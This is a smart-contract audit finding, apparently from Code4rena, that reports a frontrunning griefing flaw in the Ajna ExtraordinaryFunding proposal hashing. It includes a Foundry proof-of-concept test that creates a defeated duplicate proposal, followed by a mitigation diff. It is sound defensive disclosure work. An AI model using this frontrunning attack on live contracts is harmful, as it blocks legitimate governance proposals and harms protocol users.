Adversary can prevent the creation of any extraordinary funding proposal by frontrunning `proposeExtraordinary()`
code423n4 opened this issue · 4 comments
Lines of code
Vulnerability details
A griefing attack can be conducted to prevent the creation of any extraordinary funding proposal, or targetting specific receivers.
The cost of performing the attack is low, only involving the gas payment for the transaction.
Proof of Concept
hashes all its inputs except for endBlock_
when creating the proposalId
function proposeExtraordinary(
uint256 endBlock_,
address[] memory targets_,
uint256[] memory values_,
bytes[] memory calldatas_,
string memory description_) external override returns (uint256 proposalId_) {
proposalId_ = _hashProposal(targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_EXTRAORDINARY, keccak256(bytes(description_)))));
This allows an adversary to frontrun the transaction, and create an exact proposal, but with an endBlock
that will the proposal expire instantly, in a past block or whenever they want.
ExtraordinaryFundingProposal storage newProposal = _extraordinaryFundingProposals[proposalId_];
// ...
newProposal.endBlock = SafeCast.toUint128(endBlock_);
Nobody will be able to vote via ExtraordinaryFunding::voteExtraordinary
, as the transaction will revert because of proposal.endBlock < block.number
if (proposal.startBlock > block.number || proposal.endBlock < block.number || proposal.executed) {
revert ExtraordinaryFundingProposalInactive();
With no votes, the proposal can't be executed.
Coded Proof of Concept
This test demonstrates how an adversary can frontrun the creation of an extraordinary proposal with a value of endBlock
that will the proposal "end" instantly, while preventing the intended proposal to be created.
Add this test to ajna-grants/test/unit/ExtraordinaryFunding.t.sol
and run forge test -m "testProposeExtraordinary_Frontrun"
function testProposeExtraordinary_Frontrun() external {
// The user that will try to propose the funding
// 14 tokenholders self delegate their tokens to enable voting on the proposals
_selfDelegateVoters(_token, _votersArr);
vm.roll(_startBlock + 100);
// set proposal params
uint256 endBlockParam = block.number + 100_000;
uint256 tokensRequestedParam = 50_000_000 * 1e18;
// generate proposal targets
address[] memory targets = new address[](1);
targets[0] = address(_token);
// generate proposal values
uint256[] memory values = new uint256[](1);
values[0] = 0;
// generate proposal calldata
bytes[] memory calldatas = new bytes[](1);
calldatas[0] = abi.encodeWithSignature(
// An attacker sees the proposal in the mempool and frontruns it.
// By setting an `endBlock_ == 0`, it will create a "defeated" proposal.
// So when the actual user tries to send the real proposal, that one will revert.
address attacker = makeAddr("attacker");
uint256 pastEndBlockParam = 0; // @audit
uint256 proposalId = _grantFund.proposeExtraordinary(
pastEndBlockParam, targets, values, calldatas, "Extraordinary Proposal for Ajna token transfer to tester address"
// Verify that the proposal is created and has a `Defeated` state
IFunding.ProposalState proposalState = _grantFund.state(proposalId);
assertEq(uint8(proposalState), uint8(IFunding.ProposalState.Defeated));
// When the user tries to send the proposal it will always revert.
// As a previous proposal with the same hash has been already sent, despite that having a malicious `endBlockParam`.
endBlockParam, targets, values, calldatas, "Extraordinary Proposal for Ajna token transfer to tester address"
Tools Used
Manual Review
Recommended Mitigation Steps
Add endBlock_
to the hash of the proposal. This way there will be no impact in frontrunning the transaction, as the expected proposal will be stored.
function proposeExtraordinary(
uint256 endBlock_,
address[] memory targets_,
uint256[] memory values_,
bytes[] memory calldatas_,
string memory description_) external override returns (uint256 proposalId_) {
- proposalId_ = _hashProposal(targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_EXTRAORDINARY, keccak256(bytes(description_)))));
+ proposalId_ = _hashProposal(endBlock_, targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_EXTRAORDINARY, keccak256(bytes(description_)))));
function executeExtraordinary(
+ uint256 endBlock_,
address[] memory targets_,
uint256[] memory values_,
bytes[] memory calldatas_,
bytes32 descriptionHash_
) external nonReentrant override returns (uint256 proposalId_) {
- proposalId_ = _hashProposal(targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_EXTRAORDINARY, descriptionHash_)));
+ proposalId_ = _hashProposal(endBlock_, targets_, values_, calldatas_, keccak256(abi.encode(DESCRIPTION_PREFIX_HASH_EXTRAORDINARY, descriptionHash_)));
Assessed type
MikeHathaway marked the issue as sponsor confirmed
Picodes marked the issue as satisfactory
Picodes marked the issue as primary issue
Picodes marked the issue as selected for report